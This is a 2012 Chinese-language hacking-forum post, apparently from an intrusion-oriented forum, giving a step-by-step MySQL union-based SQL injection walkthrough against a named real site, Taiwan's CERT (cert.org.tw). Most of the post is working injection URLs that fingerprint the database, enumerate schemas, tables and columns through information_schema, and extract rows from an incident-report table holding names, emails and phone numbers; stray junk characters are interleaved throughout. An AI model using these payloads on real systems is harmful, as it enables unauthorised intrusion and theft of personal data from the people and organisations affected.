找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1835|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
* K1 x* Q$ N3 c8 ^2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
5 H1 }7 J- O' T" s9 yhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
4 I" \; ~3 B) B  h8 A3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--9 h/ o6 R  U7 Y+ y
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。) B; G0 c+ R7 w! u& Z
4.判断有没有写权限/ a$ [. W4 |! L, Q' {4 h6 [! Q! P
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限/ m( [' o& I+ P: c- S
没办法,手动猜表啦+ x9 p4 _: j4 a7 ~( G
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
' r: Q, i: _* v# J* ]但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
+ g: h) o3 w6 ]; u4 L- Chttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
: d* c2 k* b; f  k成功查出所有数据库,国外的黑客就是不一般。数据库如下:
7 L8 W) ~# Y5 o& |( Q) a' tinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb1 y/ f' ?% T, W# N: o2 e$ f' y
6.爆表,爆的是twcert库
) X& j$ h# u. P9 c$ p' G  ohttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
) c$ F& [0 _- o' G8 L/ P, Z$ Q爆出如下表
6 _# N! \% {* a* mdownloadfile,irsys,newsdata,secrpt,secrpt_big5) Y2 L% B( j' K. k; T
7.爆列名,这次爆的是irsys表5 Q# d( U! q8 x5 S
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--! K1 u% l5 j6 I5 n/ m7 |( Z, N
爆出如下列  Y' E! i2 C( Y  H5 A( W' `. _0 x( N/ U
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status' A$ G7 F  U4 \7 L8 j
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
) \* n: F, m, n# ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--" R/ C" L' Y# w) z  u# g
返回是3,说明每个列里有3个地段5 }. o4 k6 F/ ^+ `: `' |% ?4 l
9.爆字段内容
0 v" ?! e  p/ x' G) b% Ihttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
0 Z+ `. j( L5 @8 V  g爆出name列的第一个字段的内容0 B' h3 h) m% [) j3 [: P9 F0 A* F
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--* E8 \% ]' E* Y
爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表